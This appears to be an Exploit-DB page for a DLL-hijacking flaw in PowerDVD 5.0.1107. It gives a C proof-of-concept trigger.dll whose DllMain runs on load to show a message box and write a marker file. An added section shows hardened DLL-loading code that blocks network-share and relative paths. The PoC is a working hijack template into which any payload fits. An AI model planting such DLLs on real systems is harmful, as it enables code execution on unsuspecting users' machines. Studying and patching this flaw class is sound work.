- 18 Dec 2022
- EDB-ID: 34853
- EDB Verified: Passed
- Author: INJ3CTI0N P4CK3T
- Vulnerability type: REMOTE
- Platform: WINDOWS
- CVE: N/A
- Publication date: 2010-10-19
PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution
C:
// source: https://www.securityfocus.com/bid/44193/info
PowerDVD is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
PowerDVD 5.00.1107 is vulnerable; other versions may also be affected.
/*
[*] Author: Inj3cti0n P4ck3t
[*] e-mail: [email protected]
[*] Date: 18/10/2010
[*] Name BUG: PowerDVD 5.00.1107 DLL Hijacking Exploit (trigger.dll)
[*] System tested: Windows XP (Version 5.1 Service Pack 3)
[*] PowerDVD.exe Version: 5.00.1107
[*] Software to Download: Not available
[*] Application Path: C:\Arquivos de programas\CyberLink\PowerDVD\PowerDVD.exe
[*] DLL Found => trigger.dll
Greetz: fvox
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* PoC payload: show a message box and write a marker file to prove the DLL was loaded. */
int testando()
{
    FILE *fp;
    MessageBox(0, "Testando PoC", "PoC", MB_OK);
    fp = fopen("Inj3cti0nP4ck3t.txt", "w");
    if (fp != NULL) {
        fwrite("it works ;-)", 1, 12, fp);
        fclose(fp);
    }
    exit(1);
    return 0;
}

/* Runs as soon as the host process loads the DLL. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    testando();
    return TRUE;
}
- Source: www.exploit-db.com
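A hardened loading pattern for the bug class described above, as an added example that is not part of the original advisory or PoC: the classifier rejects relative and network-share module references, and on Windows the wrapper restricts the search to the application directory and System32. All function names are hypothetical, and how PowerDVD itself loads trigger.dll is an assumption the page does not show.

```c
/* Added example, not from the advisory; all function names are hypothetical. */
#include <ctype.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif
enum dll_ref { DLL_BARE_NAME, DLL_RELATIVE, DLL_UNC, DLL_LOCAL_ABSOLUTE };

/* Classify a module reference by how the loader would resolve it. */
enum dll_ref classify_dll_ref(const char *p)
{
    if (p == NULL || *p == '\0')
        return DLL_RELATIVE;
    /* Two leading separators: UNC share or device path, treated as remote. */
    if ((p[0] == '\\' || p[0] == '/') && (p[1] == '\\' || p[1] == '/'))
        return DLL_UNC;
    if (isalpha((unsigned char)p[0]) && p[1] == ':' && (p[2] == '\\' || p[2] == '/'))
        return DLL_LOCAL_ABSOLUTE;
    /* No separator or drive colon: resolved purely through the search order. */
    return strpbrk(p, "\\/:") == NULL ? DLL_BARE_NAME : DLL_RELATIVE;
}

/* Bare names pass only because load_dll_restricted() pins the search path. */
int dll_ref_allowed(const char *p)
{
    enum dll_ref k = classify_dll_ref(p);
    return k == DLL_BARE_NAME || k == DLL_LOCAL_ABSOLUTE;
}

#ifdef _WIN32
/* LOAD_LIBRARY_SEARCH_* needs Windows 8+, or Vista/7 with KB2533623. */
HMODULE load_dll_restricted(const char *name)
{
    char root[4] = { 0 };
    if (!dll_ref_allowed(name))
        return NULL;
    if (classify_dll_ref(name) == DLL_LOCAL_ABSOLUTE) {
        root[0] = name[0]; root[1] = ':'; root[2] = '\\';
        if (GetDriveTypeA(root) == DRIVE_REMOTE)   /* mapped network drive */
            return NULL;
    }
    SetDllDirectoryA("");   /* drop the current directory from the search order */
    return LoadLibraryExA(name, NULL,
        LOAD_LIBRARY_SEARCH_APPLICATION_DIR | LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif

/* Constructed input: a share path is rejected, so the exit status is 0. */
int main(void) { return dll_ref_allowed("\\\\fileserver\\media\\trigger.dll"); }
```

On Windows XP, the system the PoC was tested on, the `LOAD_LIBRARY_SEARCH_*` flags are unavailable, so only the path check and `SetDllDirectoryA("")` apply there.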